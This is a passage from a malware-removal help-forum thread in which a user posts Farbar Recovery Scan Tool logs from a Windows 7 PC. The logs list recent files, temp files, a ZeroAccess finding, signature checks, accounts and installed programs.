2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-15 19:42 - 2017-02-09 12:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-15 19:42 - 2017-02-09 12:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-15 19:42 - 2017-02-09 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-15 19:42 - 2017-02-09 12:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-15 19:42 - 2017-02-09 11:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-15 19:42 - 2017-02-09 11:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-15 19:42 - 2017-02-09 11:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-15 19:42 - 2017-02-09 11:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-15 19:42 - 2017-02-09 11:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-15 19:42 - 2017-02-09 11:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-15 19:42 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-15 19:42 - 2017-02-09 11:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:42 - 2017-02-06 12:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:42 - 2017-01-13 14:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 14:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-15 19:42 - 2017-01-06 14:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-15 19:42 - 2017-01-06 13:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-15 19:38 - 2017-02-22 19:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-15 19:38 - 2017-02-22 19:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-15 06:10 - 2017-03-15 06:10 - 00003128 _____ C:\Windows\System32\Tasks\DRScanner Startup
2017-03-15 06:10 - 2017-03-15 06:10 - 00002038 _____ C:\Users\Public\Desktop\HouseCall for Home Networks.lnk
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HouseCall for Home Networks
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\Program Files\WinPcap
2017-03-14 15:49 - 2017-03-14 15:49 - 00000000 ____D C:\Windows\Trend Micro
2017-03-14 15:44 - 2017-03-14 15:44 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64 (1).exe
2017-03-14 15:42 - 2017-03-14 15:42 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64.exe
2017-03-14 14:53 - 2017-03-14 14:53 - 00073600 _____ C:\Users\KEKLR\Documents\Oklahoma’s Deadliest Tornado-3.pdf
2017-03-14 14:17 - 2017-03-14 14:18 - 00073594 _____ C:\Users\KEKLR\Downloads\Oklahoma’s Deadliest Tornado.pdf
2017-03-14 14:07 - 2017-03-14 14:07 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-03-14 14:07 - 2017-03-14 14:07 - 00002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2017-03-14 13:49 - 2017-03-14 13:49 - 01204344 _____ (Adobe Systems Incorporated) C:\Users\KEKLR\Downloads\readerdc_en_xa_install.exe
2017-03-12 19:38 - 2017-03-12 19:39 - 02822778 _____ C:\Users\KEKLR\Downloads\Attachments_2017312.zip
2017-03-11 14:42 - 2017-03-11 14:42 - 00108087 _____ C:\Users\KEKLR\Downloads\Special Topics Books(1).pdf
2017-03-11 14:38 - 2017-03-11 14:38 - 00111570 _____ C:\Users\KEKLR\Downloads\Petrology Book(1).pdf

Attached Files


Edited by krtate, 08 April 2017 - 03:20 PM.


#2 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 08 April 2017 - 03:20 PM

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-08 13:56 - 2016-10-16 19:56 - 00000911 _____ C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-08 13:56 - 2016-10-16 19:56 - 00000725 _____ C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-08 13:56 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-04-08 13:51 - 2016-11-24 19:27 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Mozilla
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-04-08 13:20 - 2015-04-25 11:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-04-08 13:13 - 2009-08-09 03:51 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-08 13:00 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-08 13:00 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-08 12:53 - 2014-05-16 06:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-08 12:50 - 2010-01-02 05:15 - 00000189 _____ C:\ProgramData\HPWALog.txt
2017-04-08 12:48 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-08 12:45 - 2010-03-09 18:28 - 00000000 ____D C:\Users\KEKLR\Documents\Mitchell Family 2009
2017-04-08 12:39 - 2010-01-19 08:35 - 00000000 ____D C:\Program Files (x86)\Trend Micro
2017-04-08 12:32 - 2011-12-25 21:27 - 08846941 _____ C:\Users\KEKLR\AppData\Local\census.cache
2017-04-08 12:28 - 2011-12-25 21:27 - 00126206 _____ C:\Users\KEKLR\AppData\Local\ars.cache
2017-04-08 10:52 - 2012-08-13 00:24 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-08 10:51 - 2012-08-13 00:24 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-07 18:06 - 2010-01-02 05:19 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-04 06:58 - 2017-01-31 19:16 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForKEKLR.job
2017-04-03 21:39 - 2011-01-13 09:53 - 00000000 ____D C:\Users\KEKLR\Documents\Moms cards sayings
2017-04-03 20:23 - 2017-01-31 19:16 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKEKLR
2017-04-02 19:19 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2017-04-02 18:18 - 2016-11-23 10:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-02 18:18 - 2012-04-30 06:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-25 12:46 - 2009-07-14 01:13 - 00788704 _____ C:\Windows\system32\PerfStringBackup.INI
2017-03-25 12:46 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2017-03-22 06:47 - 2016-06-08 18:17 - 00000000 ____D C:\Users\KEKLR\Documents\DigiStamps
2017-03-19 20:14 - 2009-07-14 00:45 - 00464288 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-19 20:10 - 2014-12-10 15:46 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-19 20:10 - 2014-05-06 13:32 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-19 20:10 - 2009-07-14 01:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-19 19:45 - 2013-07-27 22:12 - 00000000 ____D C:\Windows\system32\MRT
2017-03-17 06:39 - 2010-01-03 15:16 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-17 06:32 - 2015-02-20 18:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-14 14:50 - 2015-07-10 05:57 - 02244280 _____ C:\Users\KEKLR\Documents\AdobeAcroCleaner_DC2015.exe
2017-03-14 14:09 - 2014-08-22 07:59 - 00000000 ____D C:\Users\KEKLR\AppData\Local\Adobe
2017-03-14 14:08 - 2015-05-13 20:23 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-03-14 12:31 - 2014-05-22 19:38 - 00000000 ____D C:\Users\KEKLR\Documents\Taylor Tax
2017-03-14 08:46 - 2012-03-29 09:12 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-03-14 08:46 - 2012-03-29 09:12 - 00004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-03-14 08:46 - 2011-05-19 12:44 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-14 08:45 - 2012-01-05 06:12 - 00000000 ____D C:\Windows\system32\Macromed
2017-03-14 08:45 - 2009-08-09 03:40 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-03-11 14:58 - 2014-05-22 19:25 - 00000000 ____D C:\Users\KEKLR\Documents\Bloomsburg

==================== Files in the root of some directories =======

2014-11-13 10:45 - 2014-11-13 10:45 - 6000640 _____ () C:\Program Files (x86)\GUTAF36.tmp
2011-03-24 19:07 - 2011-06-12 16:08 - 0001854 _____ () C:\Users\KEKLR\AppData\Roaming\GhostObjGAFix.xml
2010-01-13 12:03 - 2013-08-26 15:30 - 0001356 _____ () C:\Users\KEKLR\AppData\Roaming\wklnhst.dat
2011-12-25 21:27 - 2017-04-08 12:28 - 0126206 _____ () C:\Users\KEKLR\AppData\Local\ars.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2011-12-25 21:27 - 2017-04-08 12:32 - 8846941 _____ () C:\Users\KEKLR\AppData\Local\census.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-05-03 10:28 - 2010-05-03 10:28 - 0000036 _____ () C:\Users\KEKLR\AppData\Local\housecall.guid.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2012-01-05 08:43 - 2012-01-05 09:26 - 0007598 _____ () C:\Users\KEKLR\AppData\Local\Resmon.ResmonCfg
2014-05-03 11:58 - 2014-05-03 11:58 - 0000010 _____ () C:\Users\KEKLR\AppData\Local\sponge.last.runtime.cache
2011-01-25 22:09 - 2011-01-25 22:09 - 0152028 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].0
2011-01-25 22:09 - 2011-01-25 22:09 - 0175047 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].JPG
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2013-09-01 17:00 - 2013-09-01 17:00 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-01-02 05:15 - 2017-04-08 12:50 - 0000189 _____ () C:\ProgramData\HPWALog.txt
2010-01-13 10:46 - 2016-11-23 07:48 - 0006069 _____ () C:\ProgramData\hpzinstall.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}

Some files in TEMP:
====================
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe

Some zero byte size files/folders:
==========================
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-02 19:00

==================== End of FRST.txt ============================



#3 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 08 April 2017 - 03:32 PM

Ran by KEKLR (08-04-2017 14:12:54)
Running from C:\Users\KEKLR\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2010-01-02 09:06:14)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3698744866-2675293530-421701469-500 - Administrator - Disabled)
Guest (S-1-5-21-3698744866-2675293530-421701469-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3698744866-2675293530-421701469-1002 - Limited - Enabled)
KEKLR (S-1-5-21-3698744866-2675293530-421701469-1001 - Administrator - Enabled) => C:\Users\KEKLR

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Administrative Medical Assisting, 6th Edition (HKLM-x32\...\Administrative Medical Assisting_is1) (Version:  - Cengage Learning)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)
Amazon Kindle (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Amazon Kindle) (Version:  - Amazon)
Bible Data Type System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Camera Window DS (x32 Version: 5.2 - Canon) Hidden
Camera Window DVC (x32 Version: 5.4 - Canon) Hidden
Camera Window MC (x32 Version: 5.4 - Canon) Hidden
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001AB29C-5468-4972-8D24-2EBDB2B12133}) (Version: 5.4 - Canon)
Canon Camera Window DS for ZoomBrowser EX (HKLM-x32\...\InstallShield_{6B8BDABA-6737-4998-AEE4-E218EDE5FC7A}) (Version: 5.2 - Canon)
Canon Camera Window MC 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{89EB3ED7-225A-412E-B048-623D502C000F}) (Version: 5.4 - Canon)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{68D27126-BF6A-457D-8DD0-5F35E8D41310}) (Version: 1.3.1.21 - Canon)
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001EB665-D9EC-415E-9E13-AD2125B2B992}) (Version: 2.1 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM-x32\...\InstallShield_{218BBBE3-FE63-4BB2-81A8-7435575A84FA}) (Version: 3.1.14 - Canon)
Canon ZoomBrowser EX (HKLM-x32\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.02.0100 - Canon)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.3.0.5014 - Citrix Systems, Inc.)
Common System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.81.0000 - Seiko Epson Corporation)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 2.00.00 - Seiko Epson Corporation)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 2.30.00 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
EPSON WF-3620 Series Printer Uninstall (HKLM\...\EPSON WF-3620 Series) (Version:  - SEIKO EPSON Corporation)
Epson WF-3620 User’s Guide version 1.0 (HKLM-x32\...\UsersGuideEpson WF-3620 User’s Guide_is1) (Version: 1.0 - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
